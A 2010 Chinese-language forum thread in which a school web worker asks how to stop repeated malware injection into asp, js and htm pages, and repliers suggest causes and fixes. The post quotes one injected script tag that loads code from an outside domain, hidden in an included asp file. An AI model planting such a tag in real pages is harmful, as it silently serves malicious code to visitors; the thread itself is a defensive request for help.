[問題] 網頁空間asp, js, htm中毒問題

看板Web_Design作者 (ss163500)時間14年前 (2010/03/17 17:00), 編輯推噓1(1020)
留言21則, 4人參與, 最新討論串1/1
最近學校某處室跟某些系所的空間一直中毒 中毒現象是 htm檔的body會被植入奇怪的網址 js檔也會被放入奇怪的網址(檔案大小會變,但抓下來時防毒軟體會叫,就沒打開來看過) asp檔的body部分也會被放 今天發現一個更絕的,有個board.asp用瀏覽器檢視原始碼 發現在<html>上面被放了 <script src=http://fzhehui.cn/news/member_guanli.php ></script> 可是用DW開卻沒看到,最後終於發現有一行<!-- #include file="setup_data.asp" --> 打開那個檔,發現放在程式最後%>的後面! 在學校做網頁的人也真悲哀,都要美工兼文書處理兼程式兼網管 首先是教官或職位不高不低的人員(職位高的狗官不會看網頁)發現網頁不能開或有毒 或是同學開網頁發現防毒軟體會叫,火狐或chrome會出現紅屏 ---->跟學校計中講 --------->計中裝死,說是各處室網頁主機的問題 ---->跟該網頁所屬的處室講(如教官室、生輔組...等等) --------->教官馬上摳工讀生、組長或不會電腦的老師趕緊摳校務基金進用人員 --------------->工讀生或基層人員不知道不懂怎麼根治 只能被動的重傳乾淨的js檔、htm、asp檔上去,遇到一次傳一次 ------------------>問計中有沒有辦法根治 ----------------------->計中裝死迴圈 請問除了看到一次清一次,對於這種網頁病毒還有沒有根治方法呀??? 只知道空間支援asp -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 210.240.195.8 ※ 編輯: ss163500 來自: 210.240.195.8 (03/17 17:03)

03/17 17:28, , 1F
提供你一個好玩的方法 網頁確定不動的時候 可以設唯讀
03/17 17:28, 1F

03/17 17:28, , 2F
只要 iusr 或其他網路使用者沒有權限就可以了
03/17 17:28, 2F

03/17 17:30, , 3F
之前我管的網站也是這樣 查姑狗後發現這應該是叫網頁掛馬
03/17 17:30, 3F

03/17 17:31, , 4F
有可能是因為網頁程式連資料庫沒寫好 被用SQL INJECTION
03/17 17:31, 4F

03/17 17:32, , 5F
攻擊或是其他方法之類的 當時我懷疑是伺服器的FTP帳密被猜
03/17 17:32, 5F

03/17 17:32, , 6F
到 後來改掉以後觀察一陣子發現沒事了 不然當時我也是每天
03/17 17:32, 6F

03/17 17:33, , 7F
都慢慢傳乾淨的網頁上去 囧
03/17 17:33, 7F

03/17 17:34, , 8F
一樓的方法好像不錯 我來試看看XD
03/17 17:34, 8F

03/17 17:43, , 9F
用filezilla改的時候出現
03/17 17:43, 9F

03/17 17:44, , 10F
500 'SITE CHMOD 444 index.html': command not understo
03/17 17:44, 10F

03/17 17:46, , 11F
od 是空間不支援?那這樣把檔案改成唯讀再傳上去可以嗎?
03/17 17:46, 11F

03/19 01:44, , 12F
啊 改唯讀跟改屬性444都沒用 空間權限不支援
03/19 01:44, 12F

03/19 10:01, , 13F
不支援的是在ftp下指令 一般如果有提供管理介面的話
03/19 10:01, 13F

03/19 10:01, , 14F
可能試試啦 雖然不是很正規的anti-hack 但可以擋一陣子
03/19 10:01, 14F

03/19 14:55, , 15F
嗚嗚改密碼也沒用...網頁又被改了 難道有內鬼?
03/19 14:55, 15F

03/19 17:59, , 16F
和密碼無關啦~ XD
03/19 17:59, 16F

03/20 13:39, , 17F
無法改屬性 會500 SITE not understood 好像ftp不支援
03/20 13:39, 17F

03/20 13:40, , 18F
也沒有啥管理介面 就只有一組帳號密碼跟ftp網址而已
03/20 13:40, 18F

03/20 13:41, , 19F
別的處室改過密碼但還是照樣持續中獎 最終只有砍掉重練?
03/20 13:41, 19F

03/22 16:52, , 20F
是主機問題沒錯啊..主機整台被駭了..當然沒用..
03/22 16:52, 20F

03/22 16:52, , 21F
主機要先解毒和設好防火牆呀....
03/22 16:52, 21F
文章代碼(AID): #1Be9f65U (Web_Design)